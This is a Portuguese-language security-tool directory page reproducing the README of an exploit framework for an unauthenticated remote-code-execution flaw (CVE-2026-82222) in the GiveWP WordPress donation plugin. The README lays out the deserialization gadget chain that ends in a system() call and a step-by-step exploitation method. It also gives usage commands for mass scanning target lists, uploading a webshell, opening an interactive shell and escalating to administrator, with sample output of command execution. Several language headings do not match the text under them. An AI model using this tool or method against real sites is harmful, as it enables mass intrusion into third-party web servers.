Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-82222 — Framework de exploração para CVE-2026-82222, uma RCE não autenticada no plugin GiveWP para WordPress. Suporta varredura em massa, detecção automática, multithreading, saída em JSON/TXT e shell interativo para testes autorizados. | Kitploit
Ferramentas/GitHubGitHub/ghostlyrootb2h/cve-2026-82222
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de PenetraçãoComando e ControleDesenvolvimento de Payloads
GitHub
ghostlyrootb2h/cve-2026-82222

CVE-2026-82222

Framework de exploração para CVE-2026-82222, uma RCE não autenticada no plugin GiveWP para WordPress. Suporta varredura em massa, detecção automática, multithreading, saída em JSON/TXT e shell interativo para testes autorizados.

Ver Repositório
há 7h 38mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

⚡ GHOSTLYR00T - GiveWP RCE Exploit Framework

Python Version License Author CVE CVSS

CVE-2026-82222 - GiveWP Unauthenticated RCE Exploit
Mass Scanner + Auto-Detection + Multi-Threading + Interactive Shell


📋 Daftar Isi | Table of Contents

  • Overview
  • Fitur Utama | Key Features
  • Vulnerability Details
  • Instalasi | Installation
  • Parameter Lengkap | Complete Parameters
  • Contoh Penggunaan | Examples
  • Hasil Scan | Scan Results
  • How It Works
  • FAQ
  • Peringatan | Warning
  • Lisensi | License

  • 🎯 Overview

    GHOSTLYR00T é um framework de exploit para CVE-2026-82222, uma vulnerabilidade de PHP Object Injection no plugin GiveWP do WordPress que permite Remote Code Execution (RCE) sem autenticação. A ferramenta suporta mass scanning, auto-detection e interactive shell.

    🔴 CVSS 9.8 - CRITICAL

    Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H


    🚀 Fitur Utama | Key Features

    🇮🇩 Bahasa Indonesia

    FiturDeskripsi
    Mass ScanScan ratusan target dari file (-f targets.txt)
    Auto-DetectionDeteksi otomatis form ID, gateway, dan amount donasi
    Multi-ThreadingScan paralel dengan thread configurable (--threads)
    Check ModeFingerprint cepat tanpa exploit (--check)
    JSON OutputExport hasil ke JSON (--json)
    TXT OutputExport hasil ke TXT ringkas (--txt)
    Interactive ShellUpload webshell + terminal interaktif
    Admin EscalationAuto-escalate user ke administrator
    Progress BarMonitor real-time proses scanning
    Colored OutputOutput dengan warna dan format profesional

    🇬🇧 English

    FeatureDescription
    Mass ScanScan hundreds of targets from file (-f targets.txt)
    Auto-DetectionAuto-detects form ID, gateway, and donation amount
    Multi-ThreadingParallel scanning with configurable threads
    Check ModeFast fingerprint without exploitation (--check)
    JSON OutputExport results to JSON (--json)
    TXT OutputExport results to TXT (--txt)
    Interactive ShellUpload webshell + interactive terminal
    Admin EscalationAuto-escalate user to administrator
    Progress BarReal-time scan progress monitoring
    Colored OutputProfessional colored terminal output

    🔍 Vulnerability Details

    CVE-2026-82222 - GiveWP Unauthenticated RCE

    AspekDetail
    Affected VersionsGiveWP <= 4.16.7.1
    Patched VersionsGiveWP >= 4.16.7.2
    Attack VectorNetwork (AV:N)
    Privileges RequiredNone (PR:N)
    ImpactComplete System Compromise

    POP Chain:

    root@kitploit:~
    TCPDF::__destruct()
      -> TCPDF::_destroy(true)
        -> foreach ($this->imagekeys as $file)
          -> Symfony Session::getIterator()
            -> Session::getBag($this->attributeName)
              -> $this->storage->getBag($attributeName)
                -> DonationFactory->__call('getBag', [$attributeName])
                  -> call_user_func_array('system', [$attributeName])
    

    📦 Instalasi | Installation

    🇮🇩 Bahasa Indonesia

    🔧 Persyaratan Sistem

    • OS: Linux / Windows / MacOS
    • Python: Versi 3.8 atau lebih baru
    • Library: requests, urllib3

    📥 Langkah Instalasi

    root@kitploit:~
    # 1. Clone repository
    git clone https://github.com/GhostlyrootB2H/GHOSTLYR00T.git
    cd GHOSTLYR00T
    
    # 2. Install dependencies
    pip install requests urllib3
    
    # 3. Tes apakah berhasil
    python3 poc.py -h
    

    🇬🇧 English

    🔧 System Requirements

    • OS: Linux / Windows / MacOS
    • Python: Version 3.8 or higher
    • Libraries: requests, urllib3

    📥 Installation Steps

    root@kitploit:~
    # 1. Clone repository
    git clone https://github.com/GhostlyrootB2H/GHOSTLYR00T.git
    cd GHOSTLYR00T
    
    # 2. Install dependencies
    pip install requests urllib3
    
    # 3. Test if successful
    python3 poc.py -h
    

    🎯 Parameter Lengkap | Complete Parameters

    🇮🇩 Bahasa Indonesia

    ParameterFungsiContoh
    -f, --fileFile target (batch mode)-f targets.txt
    --threadsJumlah thread (default: 4)--threads 10
    --jsonExport hasil ke JSON--json hasil.json
    --txtExport hasil ke TXT--txt hasil.txt
    -c, --commandCommand yang dieksekusi-c "id"
    -g, --gatewayForce gateway tertentu-g stripe
    -a, --amountForce amount donasi-a 25.00
    -t, --triggersRetry attempts (default: 4)-t 5
    --timeoutTimeout per request (default: 30s)--timeout 60
    --checkFingerprint only--check
    --upload-shellUpload webshell--upload-shell
    -i, --interactiveInteractive terminal-i
    -v, --verboseVerbose output-v
    --no-colorDisable colored output--no-color

    🇬🇧 English

    ParameterFunctionExample
    -f, --fileTarget file (batch mode)-f targets.txt
    --threadsNumber of threads (default: 4)--threads 10
    --jsonExport results to JSON--json results.json
    --txtExport results to TXT--txt results.txt
    -c, --commandCommand to execute-c "id"
    -g, --gatewayForce specific gateway-g stripe
    -a, --amountForce donation amount-a 25.00
    -t, --triggersRetry attempts (default: 4)-t 5
    --timeoutRequest timeout (default: 30s)--timeout 60
    --checkFingerprint only--check
    --upload-shellUpload webshell--upload-shell
    -i, --interactiveInteractive terminal-i
    -v, --verboseVerbose output-v
    --no-colorDisable colored output--no-color

    🔥 Contoh Penggunaan | Examples

    🇮🇩 Bahasa Indonesia

    1. Single Target

    root@kitploit:~
    python3 poc.py https://target.com -c "id"
    

    2. Batch Scan (Check Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt --check --txt hasil_check.txt
    

    3. Batch Scan (Exploit Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt -c "id" --threads 5 --json hasil.json --txt hasil.txt
    

    4. Interactive Shell

    root@kitploit:~
    python3 poc.py https://target.com -c "id" --upload-shell -i
    

    5. Verbose Mode

    root@kitploit:~
    python3 poc.py https://target.com -c "id" -v
    

    🇬🇧 English

    1. Single Target

    root@kitploit:~
    python3 poc.py https://target.com -c "id"
    

    2. Batch Scan (Check Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt --check --txt check_results.txt
    

    3. Batch Scan (Exploit Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt -c "id" --threads 5 --json results.json --txt results.txt
    

    4. Interactive Shell

    root@kitploit:~
    python3 poc.py https://target.com -c "id" --upload-shell -i
    

    5. Verbose Mode

    root@kitploit:~
    python3 poc.py https://target.com -c "id" -v
    

    📊 Hasil Scan | Scan Results

    🇮🇩 Bahasa Indonesia

    Terminal Output (Berhasil Exploit)

    root@kitploit:~
    CVE-2026-82222  GiveWP <= 4.16.7.1  unauthenticated RCE  |  PoC v2.2
        target   : https://target.com
        form id  : auto-discover
        command  : id
    
    root@kitploit:~
    + GiveWP 4.15.4 detected (vulnerable).
    + User "a1788868506" registered.
    + Gadget stored in account meta.
    + Discovered 13 form(s).
    + Success! Form 37256 / gateway paypal / amount 1.00
    + Session poisoned (HTTP 500).
    +--- command output --------------------------------------------
    | uid=33(www-data) gid=33(www-data) groups=33(www-data)
    +---------------------------------------------------------------
    

    [+] SUCCESS. The target executed the command.

    TXT Output (Check Mode)

    root@kitploit:~
    # GiveWP Vulnerability Scan Results (Fingerprint Mode)
    # Generated: 2026-09-09 12:00:00
    # Total: 10 | Vulnerable: 4 | Exploited: 0 | Failed: 6
    #
    # Format: TARGET | VERSION | STATUS
    #
    https://target1.com | 4.15.4 | VULNERABLE
    https://target2.com | 4.14.6 | VULNERABLE
    

    JSON Output

    root@kitploit:~
    {
      "timestamp": 1694265600,
      "mode": "exploit",
      "total": 10,
      "vulnerable": 4,
      "exploited": 3,
      "failed": 7,
      "results": [
        {
          "target": "https://target1.com",
          "status": "exploited",
          "version": "4.15.4",
          "command_output": "uid=33(www-data) gid=33(www-data)"
        }
      ]
    }
    

    🇬🇧 English

    Terminal Output (Successful Exploit)

    root@kitploit:~
    CVE-2026-82222  GiveWP <= 4.16.7.1  unauthenticated RCE  |  PoC v2.2
        target   : https://target.com
        form id  : auto-discover
        command  : id
    
    root@kitploit:~
    + GiveWP 4.15.4 detected (vulnerable).
    + User "a1788868506" registered.
    + Gadget stored in account meta.
    + Discovered 13 form(s).
    + Success! Form 37256 / gateway paypal / amount 1.00
    + Session poisoned (HTTP 500).
    +--- command output --------------------------------------------
    | uid=33(www-data) gid=33(www-data) groups=33(www-data)
    +---------------------------------------------------------------
    

    [+] SUCCESS. The target executed the command.


    ⚙️ How It Works

    🇮🇩 Bahasa Indonesia

    Exploração Passo a Passo:

    1. Fingerprint: Detecta a versão do GiveWP via readme.txt e give.php
    2. Registro: Cria conta de doador sem autenticação via give_action=user_register
    3. Armazenamento do Payload: Armazena objeto PHP serializado no metadata last_name
    4. Descoberta de Formulários: Encontra formulários de doação via REST API e scraping
    5. Detecção Automática de Gateway/Valor: Testa combinações de gateway e valor até obter sucesso
    6. Envenenamento de Sessão: Envia doação sem o campo give_last para acionar a desserialização
    7. Acionamento e Captura: Acessa a sessão para reativar o payload e capturar a saída

    Lógica de Detecção Automática:

    root@kitploit:~
    # Gateway detection order
    CANDIDATE_GATEWAYS = ['manual', 'offline', 'paypal', 'stripe', 'square',
                          'paypalexpress', 'authorize', 'razorpay', 'mollie']
    

    Amount detection order

    AMOUNT_TESTS = ['0.01', '1.00', '5.00', '10.00', '25.00', '50.00', '100.00', '250.00', '500.00']

    🇬🇧 Inglês

    Exploração Passo a Passo:

    1. Fingerprint: Detecta a versão do GiveWP via readme.txt e give.php
    2. Registro: Cria conta de doador via give_action=user_register
    3. Armazenamento do Payload: Armazena objeto PHP serializado no metadata last_name
    4. Descoberta de Formulários: Encontra formulários de doação via REST API e scraping
    5. Detecção Automática de Gateway/Valor: Testa combinações até obter sucesso
    6. Envenenamento de Sessão: Envia doação sem give_last para acionar a desserialização
    7. Acionamento e Captura: Acessa a sessão para reativar o payload e capturar a saída

    ❓ FAQ

    🇮🇩 Indonésio

    PerguntaResposta
    Quais versões do GiveWP são vulneráveis?GiveWP <= 4.16.7.1. Versões 4.16.7.2 e superiores já foram corrigidas.
    Por que usar -a 25?Alguns formulários têm valor mínimo (ex.: $25). A ferramenta detecta automaticamente, mas pode ser forçado.
    Pode ser usado em produção?NÃO. Apenas para testes autorizados.
    Por que o registro falha (HTTP 200)?O alvo pode ter o registro desativado, WAF ativo ou versão 4.16.6+.

    🇬🇧 Inglês

    PerguntaResposta
    Quais versões do GiveWP são vulneráveis?GiveWP <= 4.16.7.1. Versões 4.16.7.2 e superiores já foram corrigidas.
    Por que usar -a 25?Alguns formulários têm valor mínimo. A ferramenta detecta automaticamente, mas pode ser forçado.
    Pode ser usado em produção?NÃO. Apenas para testes autorizados.
    Por que o registro falha (HTTP 200)?O alvo pode ter o registro desativado, WAF ativo ou versão 4.16.6+.

    ⚠️ Aviso | Warning

    ⚠️ AVISO LEGAL ⚠️

    ESTA FERRAMENTA É APENAS PARA PESQUISA DE SEGURANÇA!


    ⚠️ Ilegal: Acessar servidores sem permissão = crime
    ⚠️ Risco Legal: Viola leis de fraude informática
    ⚠️ Apenas uso autorizado: Testar seus próprios sistemas ou com permissão por escrito
    ⚠️ Responsabilidade: Os usuários são totalmente responsáveis pelo uso desta ferramenta

    USE COM SABEDORIA E RESPONSABILIDADE!

    ⚠️ AVISO LEGAL ⚠️

    ESTA FERRAMENTA É APENAS PARA PESQUISA DE SEGURANÇA!


    ⚠️ Ilegal: Acessar servidores sem permissão = crime
    ⚠️ Risco Legal: Viola leis de fraude informática
    ⚠️ Apenas uso autorizado: Testar seus próprios sistemas ou com permissão por escrito
    ⚠️ Responsabilidade: Os usuários são totalmente responsáveis pelo uso desta ferramenta

    USE COM SABEDORIA E RESPONSABILIDADE!


    📜 Licença | License

    🇮🇩 Indonésio

    Copyright © 2026 GhostlyrootB2H
    Distribuído sob a licença MIT.

    🇬🇧 Inglês

    Copyright © 2026 GhostlyrootB2H
    Distribuído sob a licença MIT.


    👨‍💻 Autor

    GhostlyrootB2H

    🐙 GitHub: @GhostlyrootB2H

    🇮🇩 Obrigado por usar o GHOSTLYR00T!
    Esta ferramenta é para aprendizado e testes de segurança.
    Não use para atividades ilegais!

    🇬🇧 Obrigado por usar o GHOSTLYR00T!
    Apenas para aprendizado e testes de segurança.
    Não use para atividades ilegais!

    Baixar ferramenta